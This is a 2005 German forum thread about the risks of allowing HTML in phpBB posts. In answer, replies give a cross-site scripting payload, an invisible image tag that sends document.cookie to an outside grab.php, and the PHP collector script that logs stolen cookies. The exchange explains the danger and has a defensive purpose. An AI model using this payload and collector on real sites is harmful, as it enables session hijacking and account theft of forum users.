Wenn HTML an ist...

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Raven, 29. Mai 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 29. Mai 2005
    HI!

    Wenn ich ein einem phBB (Board) HTML in den Beiträgen usw erlaube entsstehen dann Gefahren für mich?
    Wenn ja welche.

    mfg
     
  3. 29. Mai 2005
    Benutzer könen alle Cookies und somit die Accounts von anderen Usern klauen.
     
  4. 29. Mai 2005
    Und wie genau?
     
  5. 29. Mai 2005
    Code:
    <img width=0 height=0 src="javascript:document.images[0].src='http://www.meineseite.de/pentest/grab.php?data=' document.cookie">
     
  6. 29. Mai 2005
    Kannst du auch eine ERklärung dazu liefern?

    mfg
     
  7. 30. Mai 2005
    Angenommen in einem Forum ist HTML in den Beiträgen erlaubt:

    Du schreibst einen Post, der folgendes beinhaltet
    Dieser Code wird bei jedem Browser, der versucht das Bild anzuzeigen so interpretiert:
    Zeige ein Bild an, welche 0*0 Pixel groß ist (also zeige garnichts an), welche an der Adresse http://www.meineseite.de/pentest/grab.php?data=' document.cookie zu finden ist.
    Dumm ist nur dass der Browser bei der Anfrage den eigenen Cookie mit anhängt, so dass du diesen nurnoch mit einem Script abzugreifen brauchst.

    grab.php:
    Code:
    <?
error_reporting
(E_ALL ^ E_NOTICE);
$cookie = $_REQUEST[data];
$fic=fopen("results/cookies.txt", "a");
fwrite($fic, "$cookie\n");
fclose($fic);
?>
     
  8. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.